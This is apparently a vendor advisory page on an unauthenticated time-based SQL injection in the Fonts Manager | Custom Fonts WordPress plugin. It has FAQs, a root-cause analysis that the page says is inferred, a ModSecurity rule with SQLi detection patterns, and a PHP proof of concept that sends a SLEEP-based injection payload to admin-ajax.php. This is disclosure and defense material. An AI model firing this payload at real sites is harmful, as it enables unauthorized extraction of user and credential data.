What is CVE-2026-1800?

CVE-2026-1800 is a high-severity SQL injection vulnerability in the Fonts Manager | Custom Fonts plugin for WordPress. It allows unauthenticated attackers to manipulate SQL queries via the ‘fmcfIdSelectedFnt’ parameter, potentially extracting sensitive information from the database.

How does this vulnerability work?

The vulnerability arises from insufficient input validation and escaping of the ‘fmcfIdSelectedFnt’ parameter. Attackers can inject SQL commands that are executed by the database, allowing them to retrieve data by leveraging time-based techniques such as SLEEP to infer information.

Who is affected by this vulnerability?

All installations of the Fonts Manager | Custom Fonts plugin up to and including version 1.2 are affected. WordPress administrators using this plugin should check their plugin version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the Fonts Manager | Custom Fonts plugin and verify if the version is 1.2 or lower.

What steps should I take to fix this vulnerability?

To remediate this vulnerability, update the Fonts Manager | Custom Fonts plugin to the latest version that addresses this issue. Additionally, ensure that any SQL queries using the ‘fmcfIdSelectedFnt’ parameter utilize prepared statements to prevent SQL injection.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality of the data. It suggests that exploitation could lead to unauthorized access to sensitive information, necessitating prompt action.

What kind of data could be exposed through this vulnerability?

Exploitation of this vulnerability could allow attackers to extract sensitive data such as user emails, hashed passwords, and API keys from the WordPress database. This information could facilitate further attacks against the site.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can send a crafted POST request to the AJAX endpoint with an SQL injection payload in the ‘fmcfIdSelectedFnt’ parameter. By triggering a delay in the response, the attacker can confirm the presence of the vulnerability.

What is the significance of using prepared statements?

Using prepared statements is crucial for preventing SQL injection attacks. They ensure that user input is properly escaped and treated as data rather than executable code, significantly reducing the risk of injection vulnerabilities.

Are there any additional security measures I should implement?

In addition to updating the plugin, consider implementing regular security audits, using web application firewalls, and enforcing strong user authentication methods. These practices can help protect against a variety of vulnerabilities.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Fonts Manager | Custom Fonts plugin temporarily to prevent exploitation. Additionally, monitor your site’s logs for any suspicious activity related to SQL injection attempts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 25, 2026

CVE-2026-1800: Fonts Manager | Custom Fonts <= 1.2 – Unauthenticated SQL Injection via fmcfIdSelectedFnt parameter (fonts-manager-custom-fonts)

CVE ID CVE-2026-1800

Plugin fonts-manager-custom-fonts

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.2

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1800 (metadata-based):
This vulnerability is an unauthenticated, time-based SQL injection in the Fonts Manager | Custom Fonts WordPress plugin, affecting all versions up to and including 1.2. The flaw resides in the handling of the `fmcfIdSelectedFnt` parameter, allowing attackers to execute arbitrary SQL commands. The CVSS score of 7.5 (High) reflects its network-based attack vector and high impact on confidentiality.

Atomic Edge research infers the root cause is improper neutralization of user input within an SQL command (CWE-89). The description states insufficient escaping and lack of sufficient query preparation. This strongly suggests the plugin directly interpolated the `fmcfIdSelectedFnt` parameter value into an SQL query string without using prepared statements via `$wpdb->prepare()`. These conclusions are inferred from the CWE classification and standard WordPress security practices, as no source code diff is available for confirmation.

Exploitation likely targets a public-facing WordPress AJAX handler. A common pattern is for font management plugins to expose AJAX endpoints for front-end functionality. An attacker would send a POST request to `/wp-admin/admin-ajax.php`. The `action` parameter would correspond to a hook registered by the plugin, potentially derivable from the plugin slug (e.g., `fonts_manager_custom_fonts_action`). The malicious SQL payload would be placed in the `fmcfIdSelectedFnt` parameter, using a time-based blind technique like `SLEEP(5)` to extract data incrementally.

Effective remediation requires implementing proper input validation and using WordPress’s secure database API. The fix must replace any direct variable interpolation in SQL queries with the use of `$wpdb->prepare()`. The developer should also ensure the endpoint performs proper capability checks or nonce verification to enforce authentication if required. Without the patched version, these specific changes are inferred as the necessary corrections.

The primary impact is unauthorized extraction of sensitive information from the WordPress database. Successful exploitation could allow an attacker to retrieve hashed user passwords, user emails, API keys, and other confidential data stored in plugin tables or the core `wp_users` and `wp_posts` tables. This data breach can lead to further attacks, including site takeover. The vulnerability does not directly enable privilege escalation or remote code execution.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-1800 (metadata-based)
# This rule blocks exploitation targeting the specific vulnerable parameter.
# It assumes the attack vector is the WordPress AJAX handler with a plugin-specific action.
# The exact AJAX 'action' value is not confirmed, so the rule uses a regex based on the plugin slug.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261800,phase:2,deny,status:403,chain,msg:'CVE-2026-1800: SQLi via Fonts Manager | Custom Fonts plugin AJAX',severity:'CRITICAL',tag:'CVE-2026-1800',tag:'WordPress',tag:'Plugin',tag:'SQLi'"
  SecRule ARGS_POST:action "@rx ^(fonts_manager_custom_fonts_|fmcf_)" 
    "chain,t:none"
    SecRule ARGS_POST:fmcfIdSelectedFnt "@rx (?i)(?:sleep(s*d+s*)|benchmarks*(|waitfors+delays+['"]d|pg_sleep(|b(?:union|select)b.*b(?:from|where)b|'s*(?:--|#|/*))" 
      "t:none,t:urlDecode,t:htmlEntityDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1800 - Fonts Manager | Custom Fonts <= 1.2 - Unauthenticated SQL Injection via fmcfIdSelectedFnt parameter
<?php

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// The exact AJAX 'action' value is not specified in the CVE metadata.
// This is a common pattern inferred from the plugin slug and vulnerability type.
// An attacker would need to enumerate or guess this value.
$assumed_action = 'fonts_manager_custom_fonts_get_font'; // ASSUMPTION

// Time-based SQL Injection payload targeting the 'fmcfIdSelectedFnt' parameter.
// This payload tests if the parameter is injectable by triggering a 5-second delay.
$payload = "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -";

$post_data = array(
    'action' => $assumed_action,
    'fmcfIdSelectedFnt' => $payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Set a timeout longer than the sleep duration to observe the delay.
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);

$request_duration = $end_time - $start_time;

if ($request_duration >= 5) {
    echo "[+] Potential SQL Injection vulnerability detected. Request delayed by " . round($request_duration, 2) . " seconds.n";
    echo "[+] The 'fmcfIdSelectedFnt' parameter is likely injectable.n";
} else {
    echo "[-] No time delay observed. The endpoint or action may be incorrect, or the site may not be vulnerable.n";
    echo "    Request duration: " . round($request_duration, 2) . " seconds.n";
    echo "    Consider enumerating the correct AJAX 'action' value.n";
}

?>

Frequently Asked Questions

What is CVE-2026-1800?
Understanding the vulnerability
CVE-2026-1800 is a high-severity SQL injection vulnerability in the Fonts Manager | Custom Fonts plugin for WordPress. It allows unauthenticated attackers to manipulate SQL queries via the ‘fmcfIdSelectedFnt’ parameter, potentially extracting sensitive information from the database.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and escaping of the ‘fmcfIdSelectedFnt’ parameter. Attackers can inject SQL commands that are executed by the database, allowing them to retrieve data by leveraging time-based techniques such as SLEEP to infer information.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the Fonts Manager | Custom Fonts plugin up to and including version 1.2 are affected. WordPress administrators using this plugin should check their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the Fonts Manager | Custom Fonts plugin and verify if the version is 1.2 or lower.
What steps should I take to fix this vulnerability?
Mitigation and remediation
To remediate this vulnerability, update the Fonts Manager | Custom Fonts plugin to the latest version that addresses this issue. Additionally, ensure that any SQL queries using the ‘fmcfIdSelectedFnt’ parameter utilize prepared statements to prevent SQL injection.
What does a CVSS score of 7.5 indicate?
Understanding risk levels
A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality of the data. It suggests that exploitation could lead to unauthorized access to sensitive information, necessitating prompt action.
What kind of data could be exposed through this vulnerability?
Potential data breaches
Exploitation of this vulnerability could allow attackers to extract sensitive data such as user emails, hashed passwords, and API keys from the WordPress database. This information could facilitate further attacks against the site.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept illustrates how an attacker can send a crafted POST request to the AJAX endpoint with an SQL injection payload in the ‘fmcfIdSelectedFnt’ parameter. By triggering a delay in the response, the attacker can confirm the presence of the vulnerability.
What is the significance of using prepared statements?
Best practices in SQL query handling
Using prepared statements is crucial for preventing SQL injection attacks. They ensure that user input is properly escaped and treated as data rather than executable code, significantly reducing the risk of injection vulnerabilities.
Are there any additional security measures I should implement?
Enhancing overall security
In addition to updating the plugin, consider implementing regular security audits, using web application firewalls, and enforcing strong user authentication methods. These practices can help protect against a variety of vulnerabilities.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the Fonts Manager | Custom Fonts plugin temporarily to prevent exploitation. Additionally, monitor your site’s logs for any suspicious activity related to SQL injection attempts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations